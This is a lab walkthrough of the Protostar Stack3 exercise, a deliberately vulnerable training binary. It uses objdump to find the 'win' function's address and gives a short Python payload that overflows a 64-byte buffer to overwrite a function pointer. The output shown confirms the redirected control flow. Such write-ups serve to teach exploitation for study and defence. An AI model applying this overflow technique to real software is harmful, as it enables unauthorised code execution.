Protostar 0x03 - Stack3

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In this level, the objective is to redirect program flow. If we are able to overwrite the "fp" variable with a function pointer, the final "if" statement in the program code tells us that we will execute the the function at that address.

Let's try to overwrite "fp" with the address of "win." We can do this one of two ways: first, with gdb which we've used previously (enter "disas win"), or with "objdump." Let's try something new, and call "objdump" with the "-d" switch to disassemble all executable sections of the "stack3" program.

$ objdump -d stack3
8048424 <win>:
8048424:       55                    push   %ebp
8048425:       89 e5                 mov    %esp,%ebp
8048427:       83 ec 18              sub    $0x18,%esp
804842a:       c7 04 24 40 85 04 08  movl   $0x8048540,(%esp)
8048431:       e8 2a ff ff ff        call   8048360 <puts@plt>
8048436:       c9                    leave
8048437:       c3

So, it looks like the address we're aiming for is 0x08048424. Let's craft another Python script similar to the one in previous levels. We'll build a payload that (1) fills our 64-byte buffer and (2) overwrites the "fp" variable (which we can see immediately follows the "buffer" variable) with the address of "win."

import struct

buffer = "A" * 64
win = struct.pack("<I", 0x08048424)
payload = buffer + win

print payload

Now, we just need to execute this script with Python and pipe the output into the "stack3" function:

$ python | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed 

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